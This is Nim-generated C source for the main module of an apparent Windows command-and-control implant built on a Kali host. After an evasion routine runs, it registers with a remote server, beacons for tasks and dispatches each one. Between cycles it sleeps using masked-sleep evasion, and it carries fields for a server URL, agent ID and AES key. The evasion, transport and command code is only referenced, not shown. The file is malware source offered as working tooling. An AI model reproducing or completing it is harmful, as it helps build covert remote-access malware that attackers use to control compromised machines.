/* Generated by Nim Compiler v2.2.10 */
/* Compiled for: Windows, amd64, gcc */
/* Command for C compiler:
   x86_64-w64-mingw32-gcc -c -w -fmax-errors=3 -mno-ms-bitfields -fno-strict-aliasing -DWIN32_LEAN_AND_MEAN -Os -fno-ident   -I/home/kali/.choosenim/toolchains/nim-2.2.10/lib -I/home/kali/c2/agents/agent-nim -o /home/kali/c2/agents/agent-nim/nimcache_nim5min/@magent.nim.c.o /home/kali/c2/agents/agent-nim/nimcache_nim5min/@magent.nim.c */
#define NIM_INTBITS 64

#include "nimbase.h"
#include <string.h>
#include <windows.h>
#undef LANGUAGE_C
#undef MIPSEB
#undef MIPSEL
#undef PPC
#undef R3000
#undef R4000
#undef i386
#undef linux
#undef mips
#undef near
#undef far
#undef powerpc
#undef unix
typedef struct tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ;
typedef struct NimStrPayload NimStrPayload;
typedef struct NimStringV2 NimStringV2;
typedef struct tySequence__6H5Oh5UUvVCLiakt9aTwtUQ tySequence__6H5Oh5UUvVCLiakt9aTwtUQ;
typedef struct tySequence__6H5Oh5UUvVCLiakt9aTwtUQ_Content tySequence__6H5Oh5UUvVCLiakt9aTwtUQ_Content;
typedef struct tySequence__sM4lkSb7zS6F7OVMvW9cffQ tySequence__sM4lkSb7zS6F7OVMvW9cffQ;
typedef struct tySequence__sM4lkSb7zS6F7OVMvW9cffQ_Content tySequence__sM4lkSb7zS6F7OVMvW9cffQ_Content;
typedef struct tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg;
typedef struct tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg_Content tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg_Content;
typedef struct tyObject_TaskWire__mbM5G2Ws36WZ5MBZxEz9bWw tyObject_TaskWire__mbM5G2Ws36WZ5MBZxEz9bWw;
typedef struct Exception Exception;
typedef struct RootObj RootObj;
typedef struct TNimTypeV2 TNimTypeV2;
typedef struct tySequence__UIJx6FJrflnhA9a3u1VF1vA tySequence__UIJx6FJrflnhA9a3u1VF1vA;
typedef struct tySequence__UIJx6FJrflnhA9a3u1VF1vA_Content tySequence__UIJx6FJrflnhA9a3u1VF1vA_Content;
typedef struct tyObject_StackTraceEntry__UznwMnjUHK6AxZHnP9bMXEA tyObject_StackTraceEntry__UznwMnjUHK6AxZHnP9bMXEA;
struct NimStrPayload {
	NI cap;
	NIM_CHAR data[SEQ_DECL_SIZE];
};
struct NimStringV2 {
	NI len;
	NimStrPayload* p;
};
struct tySequence__6H5Oh5UUvVCLiakt9aTwtUQ {
  NI len; tySequence__6H5Oh5UUvVCLiakt9aTwtUQ_Content* p;
};
struct tySequence__sM4lkSb7zS6F7OVMvW9cffQ {
  NI len; tySequence__sM4lkSb7zS6F7OVMvW9cffQ_Content* p;
};
struct tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ {
	NimStringV2 serverUrl;
	NimStringV2 agentId;
	tySequence__6H5Oh5UUvVCLiakt9aTwtUQ aesKey;
	NI uriIdx;
	tySequence__sM4lkSb7zS6F7OVMvW9cffQ uriList;
};
struct tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg {
  NI len; tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg_Content* p;
};
struct tyObject_TaskWire__mbM5G2Ws36WZ5MBZxEz9bWw {
	NI64 id;
	NimStringV2 typ;
	NimStringV2 args;
	tySequence__6H5Oh5UUvVCLiakt9aTwtUQ payload;
};
struct TNimTypeV2 {
	void* destructor;
	NI size;
	NI16 align;
	NI16 depth;
	NU32* display;
	void* traceImpl;
	void* typeInfoV1;
	NI flags;
	void* vTable[SEQ_DECL_SIZE];
};
struct RootObj {
	TNimTypeV2* m_type;
};
struct tySequence__UIJx6FJrflnhA9a3u1VF1vA {
  NI len; tySequence__UIJx6FJrflnhA9a3u1VF1vA_Content* p;
};
struct Exception {
	RootObj Sup;
	Exception* parent;
	NCSTRING name;
	NimStringV2 message;
	tySequence__UIJx6FJrflnhA9a3u1VF1vA trace;
	Exception* up;
};
struct tySequence__6H5Oh5UUvVCLiakt9aTwtUQ_Content { NI cap; NU8 data[SEQ_DECL_SIZE]; };
struct tySequence__sM4lkSb7zS6F7OVMvW9cffQ_Content { NI cap; NimStringV2 data[SEQ_DECL_SIZE]; };
struct tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg_Content { NI cap; tyObject_TaskWire__mbM5G2Ws36WZ5MBZxEz9bWw data[SEQ_DECL_SIZE]; };
struct tyObject_StackTraceEntry__UznwMnjUHK6AxZHnP9bMXEA {
	NCSTRING procname;
	NI line;
	NCSTRING filename;
};
struct tySequence__UIJx6FJrflnhA9a3u1VF1vA_Content { NI cap; tyObject_StackTraceEntry__UznwMnjUHK6AxZHnP9bMXEA data[SEQ_DECL_SIZE]; };
N_LIB_PRIVATE N_NIMCALL(void, main__agent_u11)(void);
static N_INLINE(void, nimZeroMem)(void* p_p0, NI size_p1);
static N_INLINE(void, nimSetMem__system_u2188)(void* a_p0, int v_p1, NI size_p2);
N_LIB_PRIVATE N_NIMCALL(void, randomize__pureZrandom_u377)(void);
N_LIB_PRIVATE N_NIMCALL(void, killDateCheck__agent_u10)(void);
N_LIB_PRIVATE N_NIMCALL(void, applyEvasion__evasion_u17)(void);
N_LIB_PRIVATE N_NIMCALL(void, newTransport__transport_u44)(tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ* Result);
N_LIB_PRIVATE N_NIMCALL(NIM_BOOL, register__transport_u327)(tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ* t_p0);
N_LIB_PRIVATE N_NIMCALL(void, sleepMasked__evasion_u10)(NI ms_p0);
N_LIB_PRIVATE N_NIMCALL(tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg, beacon__transport_u433)(tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ* t_p0);
N_LIB_PRIVATE N_NIMCALL(void, eqdestroy___transport_u497)(tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg dest_p0);
N_LIB_PRIVATE N_NIMCALL(void, dispatchTask__commands_u51)(tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ* t_p0, NI64 id_p1, NimStringV2 typ_p2, NimStringV2 args_p3, tySequence__6H5Oh5UUvVCLiakt9aTwtUQ payload_p4);
N_LIB_PRIVATE N_NIMCALL(void, raiseDefect)(void);
static N_INLINE(void, popCurrentException)(void);
N_LIB_PRIVATE N_NIMCALL(void, eqcopy___system_u3693)(Exception** dest_p0, Exception* src_p1, NIM_BOOL cyclic_p2);
N_LIB_PRIVATE N_NIMCALL(NI, currentSleepMs__commands_u12)(void);
N_LIB_PRIVATE N_NIMCALL(void, eqdestroy___agent_u37)(tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ* dest_p0);
static N_INLINE(NIM_BOOL*, nimErrorFlag)(void);
N_LIB_PRIVATE N_NIMCALL(void, nimTestErrorFlag)(void);
N_LIB_PRIVATE N_NIMCALL(void, atpstdatssynciodotnim_Init000)(void);
N_LIB_PRIVATE N_NIMCALL(void, atpsystemdotnim_Init000)(void);
N_LIB_PRIVATE N_NIMCALL(void, atpwinleandotnim_DatInit000)(void);
N_LIB_PRIVATE N_NIMCALL(void, atpwinleandotnim_Init000)(void);
N_LIB_PRIVATE N_NIMCALL(void, atpstdatssysranddotnim_DatInit000)(void);
N_LIB_PRIVATE N_NIMCALL(void, atprandomdotnim_Init000)(void);
N_LIB_PRIVATE N_NIMCALL(void, atnwinimminus3dot9dot4minus4b7c430159be2e8b2dc4b663a9b19f7678b58f87atswinimatsincatswinbasedotnim_DatInit000)(void);
N_LIB_PRIVATE N_NIMCALL(void, atnwinimminus3dot9dot4minus4b7c430159be2e8b2dc4b663a9b19f7678b58f87atswinimatsincatswinhttpdotnim_DatInit000)(void);
N_LIB_PRIVATE N_NIMCALL(void, atmcryptodotnim_DatInit000)(void);
N_LIB_PRIVATE N_NIMCALL(void, NimMainModule)(void);
extern NIM_THREADVAR Exception* currException__system_u3660;
extern NIM_THREADVAR NIM_BOOL nimInErrorMode__system_u4172;
static N_INLINE(void, nimSetMem__system_u2188)(void* a_p0, int v_p1, NI size_p2) {
	void* T1_;
	T1_ = (void*)0;
	T1_ = memset(a_p0, v_p1, ((size_t) (size_p2)));
}
static N_INLINE(void, nimZeroMem)(void* p_p0, NI size_p1) {
	nimSetMem__system_u2188(p_p0, ((int)0), size_p1);
}
N_LIB_PRIVATE N_NIMCALL(void, killDateCheck__agent_u10)(void) {
}
static N_INLINE(void, popCurrentException)(void) {
	eqcopy___system_u3693(&currException__system_u3660, (*currException__system_u3660).up, NIM_FALSE);
}
static N_INLINE(NIM_BOOL*, nimErrorFlag)(void) {
	NIM_BOOL* result;
	result = (&nimInErrorMode__system_u4172);
	return result;
}
N_LIB_PRIVATE N_NIMCALL(void, main__agent_u11)(void) {
	tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ t_1;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	nimZeroMem((void*)(&t_1), sizeof(tyObject_AgentTransport__5qQy6rhkf3jaeikY8XXtPQ));
	randomize__pureZrandom_u377();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	killDateCheck__agent_u10();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	applyEvasion__evasion_u17();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	newTransport__transport_u44((&t_1));
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	{
		while (1) {
			{
				NIM_BOOL T6_;
				T6_ = (NIM_BOOL)0;
				T6_ = register__transport_u327((&t_1));
				if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
				if (!T6_) goto LA7_;
				goto LA2;
			}
LA7_: ;
			sleepMasked__evasion_u10(((NI)30000));
			if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		}
	} LA2: ;
	{
		while (1) {
			tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg tasks_1;
			tySequence__9c9a9ceFj9bCgncwLIjnR3kpJg T13_;
			NI T23_;
			killDateCheck__agent_u10();
			if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
			tasks_1.len = 0; tasks_1.p = NIM_NIL;
			T13_.len = 0; T13_.p = NIM_NIL;
			T13_ = beacon__transport_u433((&t_1));
			if (NIM_UNLIKELY(*nimErr_)) {eqdestroy___transport_u497(T13_); goto LA12_;}
			tasks_1 = T13_;
			{
				tyObject_TaskWire__mbM5G2Ws36WZ5MBZxEz9bWw* task_1;
				NI i_1;
				NI L_1;
				NI T15_;
				task_1 = (tyObject_TaskWire__mbM5G2Ws36WZ5MBZxEz9bWw*)0;
				i_1 = ((NI)0);
				T15_ = tasks_1.len;
				L_1 = T15_;
				{
					while (1) {
						if (!(i_1 < L_1)) goto LA17;
						task_1 = (&tasks_1.p->data[i_1]);
						dispatchTask__commands_u51((&t_1), (*task_1).id, (*task_1).typ, (*task_1).args, (*task_1).payload);
						if (NIM_UNLIKELY(*nimErr_)) goto LA12_;
						i_1 += ((NI)1);
					} LA17: ;
				}
			}
			{
				LA12_:;
			}
			{
				eqdestroy___transport_u497(tasks_1);
			}
			if (NIM_UNLIKELY(*nimErr_)) goto LA11_;
			if (NIM_UNLIKELY(*nimErr_)) {
				LA11_:;
				{
					*nimErr_ = NIM_FALSE;
					raiseDefect();
					popCurrentException();
					LA21_:;
				}
			}
			if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
			T23_ = (NI)0;
			T23_ = currentSleepMs__commands_u12();
			if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
			sleepMasked__evasion_u10(T23_);
			if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		}
	}
	{
		LA1_:;
	}
	{
		eqdestroy___agent_u37((&t_1));
	}
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
}

N_LIB_PRIVATE void PreMainInner(void) {
	atpstdatssynciodotnim_Init000();
	atpwinleandotnim_Init000();
	atprandomdotnim_Init000();
}

N_LIB_PRIVATE int cmdCount;
N_LIB_PRIVATE char** cmdLine;
N_LIB_PRIVATE char** gEnv;
N_LIB_PRIVATE void PreMain(void) {
#if 0
	void (*volatile inner)(void);
	inner = PreMainInner;
	atpsystemdotnim_Init000();
	atpwinleandotnim_DatInit000();
	atpstdatssysranddotnim_DatInit000();
	atnwinimminus3dot9dot4minus4b7c430159be2e8b2dc4b663a9b19f7678b58f87atswinimatsincatswinbasedotnim_DatInit000();
	atnwinimminus3dot9dot4minus4b7c430159be2e8b2dc4b663a9b19f7678b58f87atswinimatsincatswinhttpdotnim_DatInit000();
	atmcryptodotnim_DatInit000();
	(*inner)();
#else
	atpsystemdotnim_Init000();
	atpwinleandotnim_DatInit000();
	atpstdatssysranddotnim_DatInit000();
	atnwinimminus3dot9dot4minus4b7c430159be2e8b2dc4b663a9b19f7678b58f87atswinimatsincatswinbasedotnim_DatInit000();
	atnwinimminus3dot9dot4minus4b7c430159be2e8b2dc4b663a9b19f7678b58f87atswinimatsincatswinhttpdotnim_DatInit000();
	atmcryptodotnim_DatInit000();
	PreMainInner();
#endif
}

N_LIB_PRIVATE N_CDECL(void, NimMainInner)(void) {
	NimMainModule();
}

N_CDECL(void, NimMain)(void) {
#if 0
	void (*volatile inner)(void);
	PreMain();
	inner = NimMainInner;
	(*inner)();
#else
	PreMain();
	NimMainInner();
#endif
}

N_STDCALL(int, WinMain)(HINSTANCE hCurInstance, 
                        HINSTANCE hPrevInstance, 
                        LPSTR lpCmdLine, int nCmdShow) {
	NimMain();
	return nim_program_result;
}

N_LIB_PRIVATE N_NIMCALL(void, NimMainModule)(void) {
{
NIM_BOOL* nimErr_;
nimErr_ = nimErrorFlag();
	main__agent_u11();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	BeforeRet_: ;
	nimTestErrorFlag();
}
}

